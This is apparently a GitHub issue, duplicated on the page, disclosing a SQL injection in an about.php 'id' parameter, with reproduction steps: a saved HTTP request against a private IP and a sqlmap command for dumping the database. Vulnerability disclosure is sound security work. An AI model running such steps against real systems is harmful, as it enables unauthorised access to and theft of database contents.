Hey,I think there is a SQL Injection vulnerability in this system.
The file about.php does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database.
1.Navigate to the about page:
Example:http://172.16.180.135:8022/about.php?id=2
2.Save the request to file.
Example:
GET /about.php?id=2 HTTP/1.1
Host: 172.16.180.135:8022
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9796kkls37f6d7l72qc806mge9
Upgrade-Insecure-Requests: 1
3.Run SQLmap on the file
Example:sqlmap -r request.txt --dbms=mysql --threads=10
4.Get sensitive information from the database
about.php:
The text was updated successfully, but these errors were encountered:
Hey,I think there is a SQL Injection vulnerability in this system.


The file about.php does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database.
1.Navigate to the about page:
Example:http://172.16.180.135:8022/about.php?id=2
2.Save the request to file.
Example:
GET /about.php?id=2 HTTP/1.1
Host: 172.16.180.135:8022
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9796kkls37f6d7l72qc806mge9
Upgrade-Insecure-Requests: 1
3.Run SQLmap on the file
Example:sqlmap -r request.txt --dbms=mysql --threads=10
4.Get sensitive information from the database
about.php:
The text was updated successfully, but these errors were encountered: